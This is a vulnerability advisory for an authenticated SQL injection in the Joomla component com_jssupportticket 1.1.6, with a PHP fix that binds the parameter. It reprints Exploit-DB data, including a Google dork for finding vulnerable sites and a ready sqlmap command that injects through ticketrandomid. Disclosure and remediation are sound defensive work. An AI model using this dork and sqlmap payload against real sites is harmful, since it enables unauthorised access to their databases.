Vendor: jssupportticket
By: qw3rTyTy
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: jssupportticket
Affected Version From: 1.1.6
Affected Version To: 1.1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:joomsky:jssupportticket:1.1.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian/nginx/joomla 3.9.0
2019

Joomla! component com_jssupportticket – Authenticated SQL Injection

A SQL injection vulnerability exists in the Joomla! component com_jssupportticket, in the file admin/models/ticketreply.php. The vulnerable code is on line 31, where the ticketrandomid parameter is placed into a SQL query without being properly sanitized. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious ticketrandomid parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.
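
The mitigation above, applied to the `storeTicketReplies` check quoted in the raw data below, as an added example that is not the component's or the exploit author's code: the lookup binds `ticketrandomid` as a parameter instead of interpolating it into the SQL string. PDO with an in-memory SQLite table stands in for Joomla's database driver, and the function name `ticketMatches`, the unprefixed table name and the sample rows are assumptions made for the demonstration.

```php
<?php
// Added example. PDO + in-memory SQLite replaces Joomla's DB driver so the
// script runs on its own; table and column names follow the query on the page.

function ticketMatches(PDO $db, $ticketid, $ticketrandomid): bool
{
    if (!is_numeric($ticketid)) {
        return false;
    }
    // Request parameters can arrive as arrays (ticketrandomid[]=x); accept
    // only a non-empty string before it goes anywhere near the query.
    if (!is_string($ticketrandomid) || $ticketrandomid === '') {
        return false;
    }
    // The value is sent as a bound parameter and never becomes SQL text.
    $stmt = $db->prepare('SELECT id FROM js_ticket_tickets WHERE ticketid = :rid');
    $stmt->execute([':rid' => $ticketrandomid]);
    $res = $stmt->fetchColumn(); // false when no row matches

    // Compare as strings so "no row" can never equal a supplied ticket id.
    return $res !== false && (string) $res === (string) $ticketid;
}

// Constructed sample data (hypothetical random ids).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE js_ticket_tickets (id INTEGER PRIMARY KEY, ticketid TEXT)');
$db->exec("INSERT INTO js_ticket_tickets (id, ticketid)
           VALUES (1, 'AbC123xyZ'), (2, 'QrS456tuV')");

$cases = [
    'matching id and random id'        => [1, 'AbC123xyZ'],
    'random id of a different ticket'  => [2, 'AbC123xyZ'],
    'value containing quote characters' => [1, "' OR '1'='1"],
    'array instead of string'          => [1, ['AbC123xyZ']],
];
foreach ($cases as $label => [$id, $rid]) {
    echo $label, ': ', var_export(ticketMatches($db, $id, $rid), true), PHP_EOL;
}
```

Inside the component itself, where the query is built through Joomla's database object, the same separation of data from SQL text is obtained by passing the value through `$db->quote()` before it is concatenated into the query.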

Exploit-DB raw data:

#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 31 in file admin/models/ticketreply.php
	
	...snip...
    24	    function storeTicketReplies($ticketid, $message, $created, $data2) {
    25	        if (!is_numeric($ticketid))
    26	            return false;
    27	
    28	        //validate reply for break down
    29	        $ticketrandomid   = $data2['ticketrandomid'];		//!!!
    30	        $db = $this->getDBo();
    31	        $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'";	//!!!
    32	        $db->setQuery($query);
    33	        $res = $db->loadResult();
    34	        if($res != $ticketid){
    35	            return false;
    36	        }//end
    ...snip...

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'